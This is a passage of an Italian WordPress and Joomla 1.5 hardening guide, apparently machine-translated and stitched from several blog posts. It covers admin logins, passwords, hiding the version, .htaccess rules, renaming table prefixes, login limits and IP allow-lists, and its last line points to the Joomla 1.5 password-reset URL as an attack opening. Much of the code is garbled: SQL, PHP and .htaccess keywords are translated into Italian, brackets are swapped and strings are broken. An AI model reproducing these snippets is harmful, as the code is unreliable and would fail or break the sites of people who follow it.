Il pannello di amministrazione di WordPress viene attaccato, cosa devo fare? Protezione affidabile per WordPress dagli hacker. Utilizza una connessione sicura

Dall'articolo imparerai:

1. Utilizza un buon login.

La protezione di un sito WordPress inizia con qualcosa di basilare: creare un buon accesso. Durante l'installazione di WordPress, gli utenti spesso utilizzano il login offerto dal programma di installazione per impostazione predefinita, vale a dire: amministratore. Questo è ciò che i bot che cercano buchi di sicurezza nel tuo sito controllano per primi. Utilizzando questo login, fornisci già la metà delle informazioni necessarie agli hacker e tutto ciò che devono fare è indovinare la password.

Se hai già installato la piattaforma e stai lavorando sul tuo sito web, è improbabile che tu voglia disinstallare l'installazione e ricominciare da capo per utilizzare un accesso più sicuro. C'è un'uscita:

Passaggio 1: crea un nuovo utente

Accedi al pannello di amministrazione di WordPress e crea un nuovo account con un login più complesso, dotato di pieno accesso a tutte le funzioni del sito, ovvero diritti di amministratore.

Dal menu principale a sinistra, seleziona Utenti >> Aggiungi nuovo.

Inserisci tutte le informazioni richieste per il nuovo utente, definendone il ruolo come "Amministratore" e premere "Aggiungi nuovo utente".

Passaggio 2: rimozione dell'utente amministratore

Successivamente, disconnettersi dal sistema di gestione, accedere con uno nuovo account ed eliminare l'utente amministratore dal sistema in uno dei seguenti modi:

Metodo 1 – Dal menu principale a sinistra, seleziona Utenti >> Tutti gli utenti. Passa il mouse sopra il nome utente amministratore e vedrai la funzione "Eliminare".

Metodo 2 - Dal menu principale a sinistra, seleziona Utenti >> Tutti gli utenti. Trova un utente amministratore, selezionala e dal menu a discesa "Azioni" Selezionare "Eliminare". Successivamente fare clic sull'opzione "Fare domanda a" sotto l'elenco degli utenti. Questa opzione è utile se è necessario eliminare più utenti contemporaneamente.

Puoi anche modificare il nome utente dell'amministratore tramite una query sul database:
AGGIORNA wp_users SET user_login = 'new_login' DOVE user_login = 'admin';

Questo metodo ha uno svantaggio: l'autore è per i post scritti dall'utente amministratore, non verrà modificato. Per risolvere questo problema, è necessario effettuare un'altra query al database:
AGGIORNA wp_posts SET post_author = 'new_login' DOVE post_author = 'admin';

2. Utilizza una password complessa e unica.

Proteggere il tuo amministratore WordPress è, ovviamente, impossibile senza una password forte e valida. È importante che sia unico e includa numeri, lettere di casi diversi, segni di punteggiatura, simboli, ecc. Password come: pass, 1q2w3e4r5t6y, 87654321, qwerty, abc123, 111111, 1234, la tua data di nascita, ecc. – non sono affidabili, ma molti utenti continuano a utilizzarli. Un esempio di buona password: pcVaOF8r39. Naturalmente sarà difficile per te ricordare una password del genere, ma per questo esistono numerosi programmi che memorizzano e generano password e possono anche essere integrati nell'interfaccia del tuo browser (ad esempio Password Agent, KeyPass, Robotform, ecc.)

Se desideri comunque ricordare le tue password a memoria, ti consigliamo di creare una combinazione di password con un nome/parola che conosci, con alcune lettere/numeri maiuscoli in posti casuali e alcuni caratteri speciali all'inizio o alla fine. Anche una password del genere sarà difficile da indovinare, ma sarà abbastanza facile da ricordare.

Ricordati di aggiornare regolarmente le tue password.

3. Aggiorna la tua versione di WordPress.

WordPress ha a cuore i suoi utenti ed è per questo che puoi trovare le notifiche di disconnessione nel tuo pannello di amministrazione nuova versione. Ti consigliamo di aggiornare non appena lo vedi, poiché sta utilizzando una delle falle di sicurezza più comuni nel tuo sito versione obsoleta piattaforme.

4. Nascondi la versione di WordPress.

WordPress per impostazione predefinita aggiunge il numero di versione corrente a fonte i tuoi file e le tue pagine. E poiché molto spesso non è sempre possibile aggiornare in tempo la versione di WordPress, ciò può accadere Punto debole il tuo sito web. Sapendo quale versione di WordPress possiedi, un hacker può fare molti danni.

Utilizzando un file funzioni.php Puoi impedire la visualizzazione delle informazioni sulla versione della tua piattaforma. Per fare ciò è necessario aprire il file funzioni.php, situato nella cartella principale del tema corrente del tuo sito web (wp-content/themes/current_theme_wordpress) e aggiungi il seguente codice:
rimuovi_azione('wp_head', 'wp_generator');

Oppure puoi aggiungere il seguente codice al file funzioni.php:

/* Nasconde le stringhe della versione di WP da script e stili
* @return (stringa) $src
* @filter script_loader_src
* @filter style_loader_src
*/
funzione fjarrett_remove_wp_version_strings($src) (
globale $wp_version;
parse_str(parse_url($src, PHP_URL_QUERY), $query);
if (!empty($query['ver']) && $query['ver'] === $wp_version) (
$src = rimuovi_query_arg('ver', $src);
}
restituire $src;
}
add_filter('script_loader_src', 'fjarrett_remove_wp_version_strings');
add_filter('style_loader_src', 'fjarrett_remove_wp_version_strings');

/* Nascondi le stringhe della versione WP dal meta tag del generatore */
funzione wpmudev_remove_version() (
ritorno ";
}
add_filter('the_generator', 'wpmudev_remove_version');

Oltre a quanto sopra, in qualsiasi cartella di temi WordPress troverai intestazione.php file. Indica anche la versione della tua installazione, cosa molto interessante per un hacker, come accennato in precedenza. Rimuovendo la seguente riga dal file, eliminerai queste informazioni non necessarie:

” />

5. Scarica temi e plugin da fonti affidabili.

WordPress è così diffuso che sempre più sviluppatori creano temi e plugin già pronti. Mentre la maggior parte di essi renderà il tuo sito più facile da usare e ne amplierà le funzionalità, alcuni possono nascondere conseguenze molto spiacevoli sotto forma di virus e aprire la porta agli hacker. Utilizza solo risorse attendibili per scaricare temi e plug-in, ad esempio wordpress.org, e presta attenzione anche a eventuali avvisi visualizzati sui file dannosi. Proprio come con WordPress stesso, è importante mantenere i plugin aggiornati con le ultime versioni.

6. Non archiviare file non necessari.

Le estensioni inattive possono rappresentare una seria minaccia per la sicurezza del tuo sito web. Pertanto, sentiti libero di eliminare tutti i plugin e i temi non utilizzati. Ad esempio, l'hai installato per testare e scegliere quello che utilizzerai. Dopo aver selezionato, non dimenticare di eliminare tutti quelli non necessari.

7. Scansiona regolarmente il tuo computer locale alla ricerca di virus.

Adottare varie misure per proteggere il tuo sito WordPress è positivo, ma devi anche tenere d’occhio il tuo computer. È necessario avere installato un antivirus costantemente aggiornato. Altrimenti rischi di infettare il tuo sito web caricandovi file di virus.

8. Crea copie di backup del sito.

Non tutti gli attacchi dannosi possono essere prevenuti, ma anche un solo attacco riuscito può distruggere tutti gli sforzi compiuti per lavorare sul tuo sito. Ti consigliamo di eseguire backup regolari del tuo sito web. Molte società di hosting offrono la possibilità di eseguire il backup del server e, se succede qualcosa, è possibile ripristinare il sito da una copia disponibile sul server.

Installando il plugin WordPress Database Backup, puoi proteggere ulteriormente il database del tuo sito. Le impostazioni del plug-in ti consentono di impostare l'opzione per inviare un backup giornaliero del database alla casella di posta dei contatti.

9. Utilizza una connessione sicura.

Se preferisci caricare i tuoi file utilizzando un client FTP, utilizza un protocollo di connessione sicura al server SFTP.

10. Crea un file .htaccess.

Codice di protezione contro l'hotlinking:

RewriteEngine acceso
RiscriviCond %(HTTP_REFERER) !^http://(.+\.)?tuodominio\.com/
RiscriviCond %(HTTP_REFERER) !^$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpg [L]

L'hotlinking è l'inserimento di un'immagine dal tuo server sul sito web/blog di qualcun altro. Il traffico va direttamente al tuo server.

Utilizzando il codice sopra, puoi forzare il server a verificare da dove proviene esattamente la richiesta: se dalle pagine del tuo sito web, il server restituisce l'immagine all'utente senza problemi; se proviene dal sito Web di qualcun altro, mostra un'immagine con un errore.

11. Modificare il prefisso delle tabelle del database.

Anche la protezione di WordPress contro gli hacker verrà rafforzata se verrà rimosso il prefisso iniziale. wp_— Ciò renderà più difficile per gli aggressori trovarti. Consideriamo diversi modi:

Metodo 1 – Adatto per nuove installazioni tramite Softaculous
Se il tuo hosting provider ti consente di utilizzare lo script Softaculous per installare WordPress, puoi modificare il prefisso durante l'installazione iniziale: nella sezione Opzioni avanzate dovrai apportare le modifiche richieste.

Metodo 2 – Per siti già in esecuzione e nuove installazioni WordPress
Se il tuo WordPress è installato da molto tempo e il sito è in esecuzione, puoi modificare il prefisso utilizzando il programma phpMyAdmin.

Selezionare il database richiesto dall'elenco ed effettuare la seguente query sul database:

RINOMINARE la tabella `wp_commentmeta` IN `newprefix_commentmeta`;
RINOMINARE la tabella `wp_comments` IN `newprefix_comments`;
RINOMINARE la tabella `wp_links` IN `newprefix_links`;
RINOMINARE la tabella `wp_options` IN `newprefix_options`;
RINOMINARE la tabella `wp_postmeta` IN `newprefix_postmeta`;
RINOMINARE la tabella `wp_posts` IN `newprefix_posts`;
RINOMINARE la tabella `wp_terms` IN `newprefix_terms`;
RINOMINARE la tabella `wp_term_relationships` IN `newprefix_term_relationships`;
RINOMINARE la tabella `wp_term_taxonomy` IN `newprefix_term_taxonomy`;
RINOMINARE la tabella `wp_usermeta` IN `newprefix_usermeta`;
RINOMINARE la tabella `wp_users` IN `newprefix_users`;

Dove "nuovoprefisso_" deve essere sostituito con il nuovo prefisso che si desidera utilizzare al posto del prefisso "wp_".

Successivamente vedrai il nuovo prefisso nelle tabelle del database:

Per garantire che tutte le modifiche abbiano avuto successo e che il prefisso wp_ non sia più utilizzato nella tabella _opzioni E _usermeta, dovrai effettuare un'altra query al database:

SELEZIONA * DA `newprefix_options` DOVE `nome_opzione` COME '%wp_%'

SELEZIONA * DA `newprefix_usermeta` DOVE `meta_key` COME '%wp_%'

Di conseguenza, potresti trovare una serie di prefissi che dovrai rinominare manualmente utilizzando il pulsante Modifica:

Il numero di modifiche che dovrai apportare può variare. Ma tutti i prefissi wp_è necessario modificare il nuovo prefisso affinché il sito Web funzioni correttamente.

Successivamente, non dimenticare di apportare modifiche anche al prefisso wp-config.php file:

Puoi anche utilizzare plugin speciali per modificare il prefisso del database: Cambia prefisso DB o Cambia prefisso tabella.

12. Limita il numero di tentativi di accesso.

Molto spesso, gli aggressori effettuano un numero enorme di tentativi per accedere al tuo sito indovinando la tua password. È possibile configurare il sistema per bloccare un indirizzo IP per diverse ore dopo un certo numero di tentativi di accesso falliti.

A tale scopo è possibile utilizzare plugin aggiuntivi, ad esempio Blocco accesso o Limita tentativi di accesso. Nelle impostazioni di questi plugin è possibile impostare in modo indipendente il numero di tentativi di accesso e il tempo di blocco.

Inoltre è possibile nascondere la visualizzazione di un messaggio che informa che il login e la password immessi non sono corretti. Dopotutto, anche queste sono informazioni che possono aiutare un aggressore.

Per eliminare questo messaggio, è necessario aprire il file funzioni.php, situato nella cartella del tema corrente del tuo sito web (contenuto wp/themes/current_theme_WordPress) e aggiungi questo codice:
add_filter('login_errors',create_function('$a', "return null;"));

13. Rimuovere readme.html e License.txt.

I file readme.html e License.txt sono presenti nella cartella principale di qualsiasi installazione di WordPress. Questi file non ti sono utili, ma possono fornire agli hacker prove dei loro crimini. Ad esempio, per scoprire la versione attuale del tuo WordPress e molte altre cose utili per hackerare un sito web. Ti consigliamo di rimuoverli immediatamente dopo l'installazione di WordPress.

14. Utilizza un certificato SSL.

Per trasferire informazioni protette e garantire la riservatezza dello scambio di dati, si consiglia di utilizzare il protocollo SSL. Ciò è particolarmente vero per i negozi online se non desideri che i dati personali dei tuoi clienti vengano trasmessi in modo non protetto.

Prima di tutto, dovrai installarlo per il tuo nome di dominio.

Successivamente, puoi impostare l'uso obbligatorio del protocollo SSL quando accedi al pannello di controllo del tuo sito. Per fare questo, apri wp-config.php file che si trova nella cartella principale del tuo sito web e aggiungi la seguente riga:
define('FORCE_SSL_ADMIN', true);

15. Modifica il file wp-config.php.

Aggiungendo questo codice a wp-config.php file, puoi anche rafforzare la protezione del tuo sito web:

Restrizioni sulle modifiche al tema e ai plugin:
define('DISALLOW_FILE_EDIT', true);

Disabilitare la possibilità di installare e rimuovere plugin:
define('DISALLOW_FILE_MODS', true);

Aggiunta di chiavi salt o cosiddette chiavi di sicurezza: per prima cosa dovrai trovare tali righe in wp-config.php file:

Vedrai che le chiavi sono già installate e possono essere modificate. Oppure vedrai righe come questa: “metti qui la tua frase univoca”, che indica che le chiavi non sono ancora state installate:
/**#@+
* Chiavi e sali univoci di autenticazione.
*
* Cambiali in diverse frasi uniche!
* Puoi generarli utilizzando il (@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service)
* Puoi modificarli in qualsiasi momento per invalidare tutti i cookie esistenti. Ciò costringerà tutti gli utenti a dover effettuare nuovamente l'accesso.
*
* @dalla versione 2.6.0
*/
define('AUTH_KEY', 'inserisci qui la tua frase univoca');
define('SECURE_AUTH_KEY', 'inserisci qui la tua frase univoca');
define('LOGGED_IN_KEY', 'inserisci qui la tua frase univoca');
define('NONCE_KEY', 'metti qui la tua frase univoca');
define('AUTH_SALT', 'inserisci qui la tua frase univoca');
define('SECURE_AUTH_SALT', 'inserisci qui la tua frase univoca');
define('LOGGED_IN_SALT', 'inserisci qui la tua frase univoca');
define('NONCE_SALT', 'metti qui la tua frase univoca');

Vorrei citare separatamente alcuni plugin:

Si tratta di un plugin di sicurezza per WordPress che ti consente di scansionare il tuo sito web alla ricerca di codice dannoso, lacune e scappatoie lasciate dagli hacker, mostrando analisi del sito e del traffico in tempo reale. È anche possibile configurare la scansione automatica e molto altro.

Questo plug-in controlla il tuo sito Web per varie vulnerabilità della sicurezza e offre una serie di metodi per risolverle. Ad esempio, password, diversi diritti di accesso ai file, protezione del database, protezione delle informazioni sulla versione di WordPress, protezione dell'amministratore, ecc.

Questo plugin consente di proteggere account utente e accessi, database e file system, prevenire attacchi di forza bruta (attacchi con individuazione della password), scansionare il sito, ecc.

Per quanto triste possa sembrare, proteggere WordPress è una cosa complessa e i metodi descritti in questo articolo non garantiscono al 100% che il tuo sito sarà completamente protetto da qualsiasi azione di truffatori. Tuttavia, non dovresti trascurarli, poiché ridurranno significativamente la possibilità che gli hacker hackerino il sito.

WordPress è un CMS molto popolare, questo è senza dubbio il suo vantaggio, ci sono molti plugin per qualsiasi compito, ma questo è anche il suo punto debole, perché più il CMS di un sito è popolare, più attacchi ci sono su di esso, o meglio lo è più interessante per un utente malintenzionato, poiché dopo aver trovato una vulnerabilità in WordPress, centinaia di migliaia di siti diventano disponibili per gli aggressori, quindi proteggere il tuo sito WordPress richiede un'attenzione speciale.

Perché i siti WordPress vengono hackerati?

Tutti i CMS (motori di siti Web) più diffusi vengono hackerati e WordPress non fa eccezione, io hackero principalmente utilizzando i cosiddetti programmi (script) - exploit, per ottenere il controllo sul sito, questo viene fatto principalmente per creare collegamenti dal tuo sito ad altre risorse , e creare una BotNet che sferra attacchi DDoS su altri server, mentre il sito rimane funzionante e non vedrai mai ad occhio nudo che è infetto. In ogni caso, l'hacking avrà un effetto negativo sul tuo sito e potresti persino scomparire dai risultati di ricerca.

Come ho già detto, l'hacking avviene automaticamente, identificare il CMS di un sito non è difficile, ci sono molti servizi online per questo, spesso un programma attaccante cerca di indovinare la password dalla parte amministrativa del sito, ad es. va all'indirizzo your-site.ru/wp-admin e cerca di indovinare la password per il tuo utente, scoprire il nome utente non è difficile, scrivi articoli sotto di esso, quindi il login sarà visibile ai bot, loro sanno dove andare cercalo. a meno che, ovviamente, tu non lo abbia chiuso utilizzando un plugin, di cui parleremo di seguito. La password per l'amministratore del sito dovrebbe essere molto complessa, ma anche se questa condizione è soddisfatta, non puoi lasciare che i bot provino (forza bruta) la password per "admin", perché questo non è un carico necessario sul server, immagina se diverse dozzine di robot provenienti da diverse parti del mondo lo stanno facendo.

Plugin per proteggere WordPress dagli attacchi

Passiamo direttamente al plugin, ce ne sono diversi che vale la pena considerare, parliamo di uno più semplice e comprensibile, lo utilizzo in molti dei miei progetti, per i clienti, affronta molto bene i compiti assegnati di protezione del sito -

Questo plugin è abbastanza facile da imparare ed è russificato al 90%, viene installato come qualsiasi plugin dal repository WordPress, dopo l'installazione è necessario attivarlo ed effettuare le impostazioni di base. Appare nel menu principale nell'area di amministrazione di WordPress

Pannello di controllo del plug-in di sicurezza WP

Dopo essere andati alle impostazioni del plugin, arriviamo al pannello di controllo. Qui è possibile effettuare impostazioni importanti di base.

  1. Mostra le ultime 5 autorizzazioni nel tuo pannello di amministrazione, vengono specificati l'utente e l'indirizzo IP, ad esempio vedo subito i miei IP, ce ne sono solo due, quindi non ho dubbi che qualcun altro conosca la mia password dalla parte amministrativa.
  2. La sezione delle funzioni più importanti, qui devi includere tutto e essere d'accordo con tutto.
  3. Il plugin è in grado di tenere traccia delle modifiche ai file sull'hosting e può inviarti un rapporto via e-mail e sarai sempre consapevole di quali file sono cambiati, questo è molto utile se viene scaricato qualche tipo di script o qualsiasi file con codice dannoso, lo vedrai immediatamente nel rapporto, l'unico aspetto negativo è che dopo aver aggiornato eventuali altri plugin che hai installato o il motore stesso di WordPress, WP Security vedrà tutte queste modifiche e ti invierà un elenco enorme, ma puoi ottenere abituato a questi rapporti, perché sai quando hai aggiornato tu stesso i file.
  4. Questo elemento modifica l'indirizzo standard del pannello di amministrazione del sito tuosito.ru/wp-admin in tuosito.ru/luboe-slovo, questo salverà il tuo pannello di amministrazione da alcuni potenziali hacker e bot, ma sfortunatamente non da tutti , soprattutto quelli avanzati lo trovano ancora, posso giudicarlo guardando la sezione "Autorizzazioni", ma ne parleremo più avanti.
  5. Questa voce dovrebbe essere disattivata, come nello screenshot, è necessaria solo quando vuoi mettere il sito in manutenzione, ai visitatori verrà dato un cartello con un messaggio che il sito è in fase di lavoro tecnico, a volte questo è utile, ad esempio , quando cambi il design del sito, o in caso di alcune modifiche globali, non dimenticare che in questa modalità anche i robot di ricerca non possono visualizzare il tuo sito, non chiuderlo per molto tempo.

Proteggere l'area di amministrazione di WordPress dall'indovinare la password

Ora andiamo alla voce di menu - Autorizzazione, secondo me, una voce molto utile, e vale la pena configurarla, dato che è su uno dei miei siti. con una partecipazione di circa 1000 persone, il plugin rileva decine di tentativi al giorno di indovinare la password nel pannello di amministrazione e aggiunge gli indirizzi IP degli hacker alla lista nera, ad es. lo blocca completamente, il sito smette di rispondere a questo indirizzo IP, annullando così i tentativi di ricerca della password, le impostazioni che svolgo sullo schermo.

  1. Lascio il numero di tentativi per “sbagliare” a -3, non fare di meno, potresti inserire tu stesso la password sbagliata e finire nella lista nera con il tuo IP, dovrai farlo
  2. Questo è il tempo dopo il quale viene azzerato il contatore dei tentativi di accesso errati.
  3. Per gli indirizzi IP da cui sono stati effettuati tentativi di autorizzazione errati ho impostato un periodo di blocco più lungo, in minuti, ovvero fare il bagno per molto tempo, lo screenshot mostra 6.000.000 di minuti, ovvero circa 11 anni, penso che sia sufficiente

A tutti gli IP bloccati verrà negato l'accesso non solo al pannello di amministrazione, ma all'intero sito, tienilo presente

Elenco degli indirizzi IP bloccati

  1. l'indirizzo IP dell'aggressore
  2. il login per il quale è stata selezionata la password, tra l'altro, è corretto
  3. data in cui è stato effettuato il blocco automatico

Lista bianca di indirizzi per il pannello di amministrazione

Per consentire l'accesso alla parte amministrativa di un sito WordPress solo da determinati indirizzi IP, è possibile attivare la white list degli indirizzi nelle impostazioni del plugin.

  1. attivando questa opzione
  2. ecco il tuo indirizzo IP attuale
  3. in questo campo inserisci tutti gli indirizzi IP dai quali è consentito l'accesso al pannello di amministrazione

Se devi specificare un intervallo di indirizzi IP, invece di un numero, usa un asterisco, ad esempio 192.168.5.* - questo design darà accesso al pannello di amministrazione di WordPress da tutti gli IP che iniziano con questi numeri, questo metodo può essere utile per coloro che non dispongono di un indirizzo IP dedicato e cambia costantemente, ad esempio, quando si lavora con Internet mobile, di norma l'intervallo rimarrà entro le prime due cifre, come questo, ad esempio 192.168.* .*

Tempo di lettura: 4 minuti

Solo un anno fa, il carico del mio server superava molto spesso il limite consentito dalla tariffa. Inoltre, il problema non era nei siti stessi, ma in un banale attacco da parte degli aggressori al pannello di amministrazione per ottenere l'accesso per alcuni dei propri scopi.

Oggi ti racconto come ho affrontato il problema, cosa che ti consiglio di fare a casa, per ogni evenienza.

Di conseguenza, si è deciso di modificare l'indirizzo del modulo di accesso nel pannello di amministrazione e di chiudere il pannello di amministrazione per tutti gli estranei che non hanno il mio IP.

Vale la pena notare che alcune società di hosting hanno creato automaticamente un nuovo indirizzo amministratore per tutti gli utenti. Se utilizzi i servizi di tali servizi di hosting, non leggere ulteriori articoli e non perdere tempo.

Come cambiare l'indirizzo amministratore di WordPress

Ho già pubblicato un articolo del genere. Sembra che qui ci sia un risultato simile, ma l’effetto e lo scopo sono diversi.

Non dimenticare di creare copie di backup dei file con cui lavori.

  • Innanzitutto, copia il file wp-login.php dalla root del sito (dove si trova wp-config.php) tramite ftp sul tuo computer.
  • Rinominalo come preferisci. Ad esempio vhod.php
  • Apri questo file con il programma gratuito Notepad++ (o qualunque cosa sia più conveniente per te da modificare) e sostituisci tutte le occorrenze della frase wp-login.php con vhod.php .

Puoi farlo rapidamente premendo CTRL+F in Notepad++. Bene, nella finestra che appare, inserisci:

Quindi in un secondo ho sostituito l'occorrenza della frase che mi serviva nell'intero file. Si è verificato 12 volte.

Carichiamo il nuovo file su ftp.

Una cosa simile dovrà essere fatta nel file general-template.php, che troverai nella cartella wp-includes proprio lì su ftp. Quelli. cambia l'occorrenza della frase wp-login.php in vhod.php , ma non cambiare il nome del file stesso!

Ora hai un file .htaccess nella root del sito. Lo copiamo anche sul nostro computer e lo apriamo per la modifica (puoi utilizzare un normale Blocco note di Windows). Inseriamo un pezzo di codice che blocca l'accesso di tutti al file wp-login.php

Ordina Nega, Consenti Nega da tutti

< Files wp - login . php >

Ordine Nega, Consenti

Negato da tutti

< / Files >

È stato questo passaggio ad alleggerire l’onere e a nascondere anche il modulo di autorizzazione. Il carico è stato alleviato inserendo il codice presentato in .htaccess: se ci fosse una chiamata a http://site.ru/wp-login.php, darebbe un errore 403, non 404.

Ripetiamo brevemente l'algoritmo di funzionamento:

  • Rinominare il file wp-login.php con un nome arbitrario e sostituire le occorrenze del nome con uno nuovo.
  • Allo stesso modo, nel file general-template.php, sostituiamo il vecchio nome wp-login.php con quello nuovo.
  • Registriamo nel file .htaccess il divieto di accesso a wp-login.php per tutti

Dopo aver aggiornato WordPress, tutto ciò che resta da correggere è il file general-template.php. Ma perché Il motore non viene aggiornato molto spesso: questa è una piccola cosa rispetto all'effetto.

Impostiamo una restrizione all'accesso tramite IP tramite .htaccess

Come misura aggiuntiva per proteggere il sito, ho adottato una restrizione all'accesso all'area amministrativa tramite IP. Il problema è stato risolto in modo molto semplice: crea un file .htaccess vuoto e aggiungici il seguente codice

ordine nega, consenti consenti da 192.168.0.1 nega da tutti

ordine nega, consenti

consentire da 192.168.0.1

negato da tutti

Salviamo il file e lo inseriamo nella cartella wp-admin nello stesso posto nella radice del sito.

Invece del mio IP dell'esempio, metti quello reale. Inoltre, puoi aggiungere diversi IP con una nuova riga ciascuno:

ordine nega, consenti consenti da 126.142.40.16 consenti da 195.234.69.6 nega da tutti

ordine nega, consenti

consentire da 126.142.40.16

consentire da 195.234.69.6

negato da tutti

Se l'IP è dinamico, puoi inserire i numeri solo fino al primo, secondo o terzo punto:

Probabilmente sai già come accedere all'area di amministrazione di WordPress?

Puoi farlo in almeno quattro modi aggiungendo quanto segue all'indirizzo del tuo sito:

  1. /admin, cioè in questo modo: http://tuosito/admin
  2. /wp-admin
  3. /login
  4. /wp-login.php

In generale, tutte le prime tre opzioni di reindirizzamento ti porteranno comunque alla pagina: http://tuo_sito/wp-login.php

Si scopre che chiunque può aggiungere uno qualsiasi dei quattro prefissi sopra descritti all'indirizzo del tuo sito e vedrà il login dell'amministratore:

Naturalmente questo non significa affatto che chiunque possa entrare facilmente nel pannello di amministrazione, perché deve conoscere anche il nome utente oppure la vostra e-mail e la vostra password.

Se il tuo utente amministratore ha un login: – allora questo non è affatto prudente da parte tua e l'aggressore dovrà solo indovinare o indovinare la tua password.

Inoltre, hai visto la scritta: Nome utente o e-mail? Sì, sì, WordPress può utilizzare la posta elettronica come nome utente. Ma potresti indicare un indirizzo e-mail da qualche parte nel sito che corrisponda all'e-mail dell'utente amministratore. Si scopre che la prima cosa che un utente malintenzionato può provare è inserire la tua e-mail e poi WordPress lo aiuterà di nuovo, perché se l'e-mail non è adatta, vedrà questo messaggio:

e se l'e-mail è corretta, WordPress scriverà che la password non è corretta:

Di conseguenza, abbiamo una situazione in cui un potenziale utente malintenzionato, per hackerare il tuo sito (accesso al pannello di amministrazione), dovrà solo indovinare o indovinare la tua password.

Come proteggere l'accesso dell'amministratore da una potenziale minaccia? La risposta è semplice: prova ad aumentare il numero di incognite necessarie per entrare.

Ora diamo uno sguardo più da vicino:

  1. Se possibile, assicurati che l'e-mail dell'utente amministratore non sia menzionata da nessuna parte nel sito: l'e-mail pubblica dovrebbe essere qualcos'altro.
  2. La tua password non dovrebbe essere semplice, quando installi WordPress stesso genera una password complessa per te, se non vuoi usarla, crea una password più o meno complessa, inclusi caratteri piccoli e grandi, numeri e alcuni simboli come -, ?, _ eccetera.
  3. Anche il tuo nome utente non dovrebbe essere semplice: amministratore, manager, root, amministratore, utente e altre semplici parole!
  4. E infine, devi inserire la terza sconosciuta più importante: modificare l'URL di accesso dell'amministratore, per fare ciò, installa un semplice plug-in: WPS Hide Login
WPS Nascondi accesso

Un plugin semplice, gratuito e abbastanza popolare che ti consente di modificare l'URL di accesso dell'amministratore.

Dopo aver installato e attivato il plugin, devi andare alla sezione di amministrazione: Impostazioni/Generale, quindi scorri fino alla fine della pagina e vedi solo un parametro aggiunto da questo plugin:

Per impostazione predefinita, il plugin suggerisce di utilizzare il login http://tuosito/login, ma questa non è affatto l'opzione migliore! Inventa qualcosa di tuo, ad esempio: aaa12_go)))

Dopo aver modificato questo parametro, non dimenticare di fare clic sul pulsante Salvare le modifiche– altrimenti, con il plugin attivo, avrai il login tramite http://tuosito/login

Assicurati di provare a disconnetterti e ad accedere nuovamente all'area di amministrazione, ma utilizzando un nuovo indirizzo di accesso che hai creato tu stesso e, soprattutto, non dimenticarlo!

Dopo aver modificato il punto di ingresso dell'amministratore, quando tenta di accedere agli URL standard, l'utente riceverà una pagina di errore 404.

Attenzione! Se improvvisamente dimentichi il nuovo indirizzo di accesso dell'amministratore, dovrai disabilitare questo plugin. Questo può essere fatto senza accedere al pannello di amministrazione se hai accesso alle cartelle e ai file del sito. Devi solo rinominare o eliminare la cartella del plugin wps-nascondi-accesso, che sarà nella cartella plugin(la cartella dei plugin si trova nella cartella wp-content).

Di conseguenza: dopo aver applicato tutte le misure di cui sopra, dovremmo ricevere la protezione dell'accesso amministratore con tre incognite: e-mail / nome utente, una password complessa e il nostro URL di accesso univoco - e questo può complicare notevolmente gli sforzi dei giovani hacker)

Ciao, cari lettori del sito blog. Oggi voglio parlare di sicurezza sul lavoro e di alcuni metodi per proteggere un sito web dagli hacker. Purtroppo non sono un esperto in questo settore e le mie conoscenze non esulano dallo scopo dell'articolo in merito, ma mi limiterò a descrivere la mia recente esperienza. Non ho utilizzato nulla di complicato, ma spero che ciò aumenterà la sicurezza di lavorare con i miei siti.

Riguarda doppia autenticazione per accedere al pannello di amministrazione del motore il tuo sito web (dovrebbe funzionare su qualsiasi CMS, ma personalmente l'ho testato solo su WordPress e Joomla). La protezione è installata a livello di server, quindi tutti i tentativi di indovinare la password per il pannello di amministrazione (forza bruta) non creeranno un carico maggiore sull'hosting ed è abbastanza difficile aggirarlo. È facile da installare (letteralmente in pochi passaggi) e tra tutte le conoscenze richiede solo attenzione e capacità di accedere al sito tramite FTP.

Bene, darò anche un paio di azioni che ho applicato a siti su motori Joomla 1.5 già obsoleti, a cui non ha senso trasferirmi, ma che interrompono costantemente il mio server e utilizzano il server per inviare spam. Ho eseguito le azioni descritte di recente, quindi non posso affermare che i siti abbiano smesso di essere infettati da virus, ma lo spero. In generale, ho provato un po ' aumentare la resistenza al crack di Joomla 1.5.

Come proteggere Joomla 1.5 da hacking e virus

Come ho già detto, il problema è che due dei miei siti che eseguono Joomla 1.5 vengono costantemente violati. Possiamo considerarli abbandonati, perché non aggiungo loro nuovi materiali, ma generano regolarmente entrate (dalla pubblicazione di articoli da Miralinks e Webartex, nonché collegamenti da Gogetlinks). In generale, è un peccato buttarli via e trasferirli su una nuova versione del motore è uno spreco (una perdita di tempo e fatica).

Non resta che monitorare costantemente il carico sul server e, quando aumenta, cercare shell e altri malware tra i file del motore, oppure rafforzare in qualche modo la protezione. Per cercare malware scarico i file del motore sul mio computer e li scannerizzo con DoctorWeb e Aibolit. Il primo non trova tutto, il secondo troppo spesso vede il nemico dove non ce n’è, ma non conosco altri metodi efficaci. Anche se ci sono anche dozzine di programmi, ma questo è più conveniente per tutti.

A proposito, la sceneggiatura Aibolit può funzionare non solo sul server, ma anche direttamente sul computer nella cartella con i file del motore scaricati (basta non dimenticare di disattivare l'antivirus standard durante il download del sito, perché potrebbe eliminare alcuni file, ma lo faranno comunque rimanere sul server).

Le istruzioni dettagliate sono fornite nel video qui sotto, ma in breve, scarichi l'interprete del linguaggio PHP dal sito Web di Microsoft e lo installi. Dopodiché apri il file di script Aibolit chiamato ai-bolit.php utilizzando proprio questo interprete:

La velocità di scansione dipende dalla velocità del tuo computer e dal numero di file nel motore del tuo sito web. Mi ci sono volute diverse ore per https://site, perché Aibolit sospetta che anche le immagini nascondano virus, e ho tantissime di queste stesse immagini e i file della cache impiegano molto tempo durante la scansione. Per i siti su Joomla 1.5, la verifica è stata molto più rapida.

Ho deciso di dedicare una giornata alla ricerca di modi per migliorare la sicurezza del sito web. Siamo riusciti a fare ben poco, ma comunque meglio di niente. Iniziamo con rafforzando la protezione (e riducendo le vulnerabilità) di due siti su Joomla 1.5. È stato fatto quanto segue:


In quale altro modo proteggere Joomla 1.5 da virus e hack dello streaming

  1. Inoltre, gli "esperti" affermano che i siti su Joomla 1.5 vengono danneggiati "una o due volte" utilizzando quello disponibile nel motore (presumibilmente è possibile modificare la password dell'amministratore tramite esso). Anche se non utilizzi la registrazione sul tuo sito web e non visualizzi un collegamento di ripristino da nessuna parte, ciò non significa che hai coperto questa vulnerabilità. Aggiungi semplicemente il seguente snippet all'URL della home page del tuo sito e ottieni la funzionalità che stai cercando: /index.php?option=com_user&view=reset

